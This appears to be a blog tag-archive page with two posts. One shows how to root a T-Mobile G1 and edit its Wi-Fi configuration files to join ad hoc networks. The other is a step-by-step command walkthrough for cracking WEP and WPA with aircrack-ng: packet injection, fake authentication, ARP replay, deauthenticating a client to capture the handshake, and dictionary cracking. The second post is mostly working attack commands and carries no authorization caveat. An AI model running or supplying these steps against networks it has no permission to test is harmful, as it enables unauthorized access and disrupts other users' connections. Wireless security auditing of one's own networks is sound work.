Tag Archives: wep

How to connect to Ad Hoc networks using Tmobile G1 Android

Intro

The G1 does not connect to ad hoc networks through the wifi manager but we can hack it to allow scanning and connecting to ad hocs. I’ve been trying to figure this out for the longest time. Before you begin, you need to root your G1 and be comfortable using the command line. We will be editing tiwlan.ini and wpa_supplicant.conf. I will be showing you 2 ways to edit the files. Using vi and adb.


Settings

edit tiwlan.ini to read:

WiFiAdHoc = 1
dot11DesiredSSID = HydtechAdhoc (or whatever name u want)
dot11DesiredBSSType = 0

edit wpa_supplicant.conf to read:

ctrl_interface=tiwlan0
update_config=1
eapol_version=1
ap_scan=2 (tells wpa_supplicant to scan hidden networks)

network={
ssid=”HydtechAdhoc”
scan_ssid=1 (for APs with multiple SSIDS)
mode=1
key_mgmt=NONE
group=WEP104
auth_alg=SHARED
wep_key0=”MyWepKey” (replace MyWepKey with your key)
}

How to edit using vi:

Download terminal from the market and type:

su (for superuser mode)
mount -o rw,remount -t yaffs2 /dev/block/mtdblock3 /system (mount partition as writable)
vi /system/etc/wifi/tiwlan.ini (open tiwlan.ini in vi text editor)

now type A to enter editing mode, finish editing your file and hold trackball+1 to stop editing. To save and exit type :wq

vi /data/misc/wifi/wpa_supplicant.conf (open file for editing)

edit with the settings given above and exit and don’t forget to change the partition back to read only
mount -o ro,remount -t yaffs2 /dev/block/mtdblock3 /system

reboot

How to edit files with adb on Ubuntu:

Connect your g1 to the computer using a usb cable and make sure USB debugging in enabled
Open up terminal and type
cd /home/hydtech/[android sdk folder]/tools (navigate to the directory which has you adb tool)

get the files from the device and place them in the root folder
sudo ./adb pull /system/etc/wifi/tiwlan.ini /
sudo ./adb pull /data/misc/wifi/wpa_supplicant.conf /

edit and save the files with the settings provided above using gedit or kate or what have you

make the partition read writable
adb shell
mount -o rw,remount -t yaffs2 /dev/block/mtdblock3 /system
exit

place the files back onto the device
sudo ./adb push /tiwlan.ini /system/etc/wifi/tiwlan.ini
sudo ./adb push /wpa_supplicant.conf /data/misc/wifi/wpa_supplicant.conf

make partition read only again
adb shell
mount -o ro,remount -t yaffs2 /dev/block/mtdblock3 /system
exit

reboot device.

Troubleshooting

shows connected but no internet
1. I was having a problem where the connection would keep disconnecting and when it would connect, it wouldn’t load pages. To fix this I had to disable my WEP key.

SSID not showing
2. If the SSID isn’t showing up in the list, make sure you have ap_scan=2 in your wpa_supplicant

Unsuccessful connection
3. Try enabling static IP if DHCP isn’t working for you. It’s under advanced menu.

Sponsored by Chromehost.net

Cracking WEP & WPA with IBM Lenovo X60 – Basics

At first injection with the Intel pro wireless cards was impossible. Then came the ipwraw driver. Now, we no longer need the ipwraw as the iwl3945 card supports injection. Most linux distros now ship with this driver.

Follow these steps for a succesful WEP crack in Ubuntu:

download necessary files
sudo apt-get install aircrack-ng

place card in monitor mode
sudo airmon-ng start wlan0

test injection
sudo aireplay-ng -9 -e linksys -a 00:14:6C:7E:40:80 mon0
(0% means injection not working)

capture data and write to file called output
sudo airodump-ng -c 9 –bssid 00:14:6C:7E:40:80 -w output mon0

fake authentication
sudo aireplay-ng -1 0 -e linksys -a 00:14:6C:7E:40:80 -h 00:0F:B5:88:AC:82 mon0

replay mode
sudo aireplay-ng -3 -b 00:14:6C:7E:40:80 -h 00:0F:B5:88:AC:82 mon0

run aircrack
sudo aircrack-ng -z -b 00:14:6C:7E:40:80 output*.cap

For WPA cracking follow this:

monitor mode
sudo airmon-ng start wlan0

collect handshake
sudo airodump-ng -c 9 –bssid 00:14:6C:7E:40:80 -w psk mon0

deauth connected client
sudo aireplay-ng -0 1 -a 00:14:6C:7E:40:80 -c 00:0F:B5:FD:FB:C2 mon0

cracking
sudo aircrack-ng -w password.lst -b 00:14:6C:7E:40:80 psk*.cap

These are just refreshers. For more help check www.aircrack-ng.org